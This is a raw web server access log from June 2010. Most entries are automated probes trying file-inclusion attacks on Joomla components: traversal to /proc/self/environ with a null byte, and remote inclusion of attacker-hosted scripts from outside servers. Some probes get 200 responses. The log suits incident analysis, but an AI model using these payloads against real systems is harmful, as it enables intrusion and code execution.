222.236.47.182 - - [01/Jun/2010:06:46:14 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:06:46:14 -0500] "GET /logs/access_log.1272326400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 379 "-""Mozilla/5.0"
61.67.240.189 - - [01/Jun/2010:06:46:36 -0500] "GET /logs//index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:06:46:37 -0500] "GET //index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:06:48:51 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:06:48:52 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
81.176.232.102 - - [01/Jun/2010:06:49:04 -0500] "GET /logs/*?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
81.176.232.102 - - [01/Jun/2010:06:49:04 -0500] "GET /*?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
61.67.240.189 - - [01/Jun/2010:06:49:08 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:06:49:09 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:06:49:37 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:06:49:37 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
124.217.229.185 - - [01/Jun/2010:06:50:25 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:06:50:26 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
61.67.240.189 - - [01/Jun/2010:06:50:35 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:06:50:36 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
203.72.226.120 - - [01/Jun/2010:07:00:54 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.805"
194.100.228.237 - - [01/Jun/2010:07:00:58 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:07:00:58 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:07:01:11 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:07:01:11 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
124.217.229.185 - - [01/Jun/2010:07:03:18 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:03:18 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
194.100.228.237 - - [01/Jun/2010:07:03:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:07:03:20 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:07:03:21 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
124.217.229.185 - - [01/Jun/2010:07:03:24 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:03:25 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
194.100.228.237 - - [01/Jun/2010:07:03:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:07:03:37 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:07:03:37 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
61.8.3.157 - - [01/Jun/2010:07:06:07 -0500] "GET /logs/inurl:../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:06:08 -0500] "GET /inurl:../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:07:10 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:07:10 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:07:13 -0500] "GET /inurl:../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.808"
124.217.229.185 - - [01/Jun/2010:07:07:31 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:07:32 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.195.228 - - [01/Jun/2010:07:08:25 -0500] "GET /logs/access_log.1183939200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.251.243.63 - - [01/Jun/2010:07:09:31 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:07:09:37 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:07:09:37 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.8.3.157 - - [01/Jun/2010:07:09:43 -0500] "GET /logs/access_log.1274832000/inurl:../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:09:44 -0500] "GET /inurl:../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:09:44 -0500] "GET /logs/inurl:../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.808"
83.251.243.63 - - [01/Jun/2010:07:10:30 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:07:10:30 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:07:10:34 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:07:10:34 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.25.140.182 - - [01/Jun/2010:07:11:00 -0500] "GET /http://www.pyroshows.de/templates/benjaminhooppyroshows/images/idx.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.808"
124.217.229.185 - - [01/Jun/2010:07:13:29 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:13:29 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
61.8.3.157 - - [01/Jun/2010:07:13:56 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:13:56 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:07:13:57 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
124.217.229.185 - - [01/Jun/2010:07:14:57 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:14:57 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:07:15:04 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:07:15:05 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:07:15:05 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:15:14 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:15:15 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:07:16:09 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:07:16:10 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:07:16:11 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:20:14 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:20:15 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:20:35 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.7.108.203 - - [01/Jun/2010:07:20:35 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [01/Jun/2010:07:20:35 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
124.217.229.185 - - [01/Jun/2010:07:20:35 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
85.25.140.182 - - [01/Jun/2010:07:20:39 -0500] "GET /logs/access_log.1273622400/http://www.pyroshows.de/templates/benjaminhooppyroshows/images/idx.txt? HTTP/1.1" 404 381 "-""libwww-perl/5.808"
85.25.140.182 - - [01/Jun/2010:07:20:40 -0500] "GET /http://www.pyroshows.de/templates/benjaminhooppyroshows/images/idx.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.808"
85.25.140.182 - - [01/Jun/2010:07:20:40 -0500] "GET /logs/http://www.pyroshows.de/templates/benjaminhooppyroshows/images/idx.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.808"
94.23.11.114 - - [01/Jun/2010:07:20:47 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:07:20:47 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
207.46.13.146 - - [01/Jun/2010:07:20:55 -0500] "GET /logs/access_log.1222473600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [01/Jun/2010:07:21:05 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:07:21:06 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.224.242 - - [01/Jun/2010:07:21:26 -0500] "GET /logs/*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:21:27 -0500] "GET /*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:22:05 -0500] "GET /*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:22:05 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:22:06 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:22:13 -0500] "GET /logs/access_log.1274832000/*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:22:13 -0500] "GET /*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:22:13 -0500] "GET /logs/*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.7.108.203 - - [01/Jun/2010:07:22:17 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [01/Jun/2010:07:22:17 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
74.55.224.242 - - [01/Jun/2010:07:22:22 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:23:03 -0500] "GET /logs/access_log.1274832000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:23:03 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:23:04 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.831"
203.169.165.24 - - [01/Jun/2010:07:23:45 -0500] "GET /*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:26:10 -0500] "GET /logs/access_log.1274832000/*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:26:14 -0500] "GET /*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:26:14 -0500] "GET /logs/*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:26:19 -0500] "GET /*.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:26:35 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
74.55.224.242 - - [01/Jun/2010:07:28:35 -0500] "GET /logs/access_log.1274832000/*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:28:35 -0500] "GET /*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:28:35 -0500] "GET /logs/*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
203.169.165.24 - - [01/Jun/2010:07:28:43 -0500] "GET /logs/access_log.1274832000/*.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:28:44 -0500] "GET /*.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:28:44 -0500] "GET /logs/*.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
74.55.224.242 - - [01/Jun/2010:07:28:58 -0500] "GET /logs/access_log.1274832000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:28:58 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.55.224.242 - - [01/Jun/2010:07:28:58 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.831"
203.169.165.24 - - [01/Jun/2010:07:29:20 -0500] "GET /logs/access_log.1274832000/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:29:21 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
203.169.165.24 - - [01/Jun/2010:07:29:21 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.65"
67.195.112.180 - - [01/Jun/2010:07:30:32 -0500] "GET /costume/thmb6.htm HTTP/1.0" 200 3210 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.169.165.24 - - [01/Jun/2010:07:32:29 -0500] "GET /logs/access_log.1274313600/*.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.65"
119.235.237.16 - - [01/Jun/2010:07:33:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
119.235.237.16 - - [01/Jun/2010:07:33:21 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
203.169.165.24 - - [01/Jun/2010:07:33:47 -0500] "GET /logs/access_log.1274313600/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.65"
123.226.235.149 - - [01/Jun/2010:07:40:08 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
123.226.235.149 - - [01/Jun/2010:07:40:18 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
174.123.133.162 - - [01/Jun/2010:07:41:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.123.133.162 - - [01/Jun/2010:07:41:09 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.123.133.162 - - [01/Jun/2010:07:41:09 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.199.39 - - [01/Jun/2010:07:43:25 -0500] "GET /logs/access_log.1261785600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.120.234.211 - - [01/Jun/2010:07:44:00 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.120.234.211 - - [01/Jun/2010:07:44:00 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.249.65.59 - - [01/Jun/2010:07:44:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.226.235.149 - - [01/Jun/2010:07:45:35 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
123.226.235.149 - - [01/Jun/2010:07:45:36 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
123.226.235.149 - - [01/Jun/2010:07:45:36 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
64.91.250.11 - - [01/Jun/2010:07:45:51 -0500] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:07:45:51 -0500] "GET /logs/access_log.1271116800//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:07:45:51 -0500] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
123.226.235.149 - - [01/Jun/2010:07:46:16 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
123.226.235.149 - - [01/Jun/2010:07:46:16 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
123.226.235.149 - - [01/Jun/2010:07:46:17 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
64.91.250.11 - - [01/Jun/2010:07:46:19 -0500] "GET /logs/access_log.1272326400//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:07:46:29 -0500] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
